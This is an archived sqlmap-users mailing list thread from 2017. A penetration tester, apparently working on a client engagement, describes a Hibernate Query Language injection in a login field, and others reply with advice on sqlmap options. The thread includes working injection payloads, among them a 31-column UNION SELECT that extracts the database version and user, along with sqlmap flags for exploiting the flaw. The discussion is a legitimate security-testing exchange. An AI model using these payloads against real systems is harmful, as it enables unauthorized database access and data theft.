"Do you know the maximum number of fields the union will do" - by default
1-10. If there are more techniques usable (e.g. boolean), it will extend
it. Also, if ORDER BY is usable it will try to find the number of columns
without limitations. If you want to manually extend, use --union-cols (e.g.
1-100)
Bye
On Sat, Feb 25, 2017 at 12:28 AM, Robin Wood <robin@digi.ninja> wrote:
> Annoyingly my test window is closed and I'll probably not get to talk to
> the client will Monday but will try this out on a test box just to watch
> the traffic and see if it is doing what I think should work.
>
> Ta
>
> Robin
>
> On Fri, 24 Feb 2017, 23:23 Chris Oakley, <christopher.oak...@gmail.com>
> wrote:
>
>> I *think* (going from memory here) that it's higher than that by
>> default. There's also the --union-cols=30-40, so you should be good
>>
>> On 24 February 2017 at 18:17, Robin Wood <robin@digi.ninja> wrote:
>>
>> I hadn't tried the custom injection point, I'll give that a try. Do you
>> know the maximum number of fields the union will do, was thinking about it
>> after shutting machine down and think it's 30 so will need to increase that.
>>
>> Robin
>>
>> On Fri, 24 Feb 2017, 23:14 Chris Oakley, <christopher.oak...@gmail.com>
>> wrote:
>>
>> I assume you've tried * for custom injection point and --technique=U?
>>
>> Whether or not it'll dance with HQL is another question entirely.
>>
>> On 24 February 2017 at 16:44, Robin Wood <robin@digi.ninja> wrote:
>>
>> I've just found an instance of Hibernate Query Language injection that
>> lets me get at an underlying MySQL database if I inject in the right way,
>> some examples I've got are:
>>
>> loginName=a - works and gives 200
>> loginName=' - fails with HQL error and 500
>> loginName=a' or 'a'='a - works and gives 200
>> loginName=a\'' - gets through HQL and then generates a MySQL error in a
>> where clause. The injection gets converted to where NAME='a\'''
>>
>> With some playing I've found that this is a valid injection and they are
>> running as root as I get a 500 back when I supply root, a 200 when give
>> something else.
>>
>> loginName=a' and 'a\''="a" union select @@version,2,3,4,5,6,7,8,9,10,
>> 11,12,13,14,15,16,17,18,19,20,21,22,2,3,4,5,"2001-01-01",2,3,"2001-01-01","2001-01-01"
>> from users where user()="root@localhost" -- '='1
>>
>> The 500 is because some of the stuff from the union isn't being handled
>> correctly by the page, the 200 is because the union doesn't return any data
>> so the first bit (basically a=a) is returning valid data so getting through
>> the rest of the parsing.
>>
>> So I think what I need to do is to tell SQLMap that it is a union
>> injection with 31 fields and that the injection needs to go into here:
>>
>> loginName=a' and 'a\''="a" <INJECT> -- '='1
>>
>> Can I do this?
>>
>> I've got all this set up and running in Burp so I can test things out if
>> anyone needs me to.
>>
>> Robin
>>
>> ------------------------------------------------------------
>> ------------------
>> Check out the vibrant tech community on one of the world's most
>> engaging tech sites, SlashDot.org! http://sdm.link/slashdot
>> _______________________________________________
>> sqlmap-users mailing list
>> sqlmap-users@lists.sourceforge.net
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>>
>>
>>
> ------------------------------------------------------------
> ------------------
> Check out the vibrant tech community on one of the world's most
> engaging tech sites, SlashDot.org! http://sdm.link/slashdot
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
--
Miroslav Stampar
http://about.me/stamparm
------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, SlashDot.org! http://sdm.link/slashdot
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
